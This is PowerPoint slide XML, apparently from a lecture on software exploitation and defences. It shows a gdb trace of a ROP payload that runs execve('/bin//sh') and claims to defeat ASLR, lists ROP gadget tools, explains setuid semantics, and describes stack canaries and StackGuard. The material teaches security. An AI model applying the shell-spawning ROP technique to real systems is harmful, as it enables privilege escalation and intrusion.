          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="226143"/>
            <a:ext cx="8229600" cy="5900022"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x080ea060</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80ea060:	"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) x/2wx 0x80ea06c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80ea06c:	0x080ea060	0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) x/1wx 0x080ea068</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80ea068:	0x00000000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Continuing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>process 5381 is executing new program: /bin/dash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>", ["/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"], NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Fully ASLR proof ROP payload!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14480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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated tools to find gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwntools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ROPgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ropper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated tools to build ROP chain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ROPgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a comprehensive library used by most of the top CTF teams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>409</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1318933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098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SUID Behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) sets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is allowed only if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not 0, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>seteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) sets the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not 0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> must be either the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setresuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ruid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>euid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows one to set the three IDs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unprivileged processes can only switch among existing values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the saved UID, a SUID process can securely switch between the the ID of the user invoking the program and the ID of the user owning the executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10130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0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0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80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809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809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809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2809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Making Exploitation Harder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The next step is preventing the overwrite of the return address on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 2: Canaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks, USENIX Security 1998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202574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4772" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>StackGuard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1184773" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> writes a canary value before the return address on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terminator canary: NULL(0x00), CR (0x0d), LF (0x0a) and EOF (0xff)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Random canary: random value stored in location known only to the validation code (and protected with unmapped pages)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XOR canary: random ^ return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During the epilogue the value is verified before performing a ret instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is achieved by means of a modified function prologue/epilogue (need recompilation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduces overhead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55605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47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8477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8477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8477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8477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8477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8477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Stack Canaries in Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The GNU compiler (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) implements a form of stack protection, known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ProPolice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
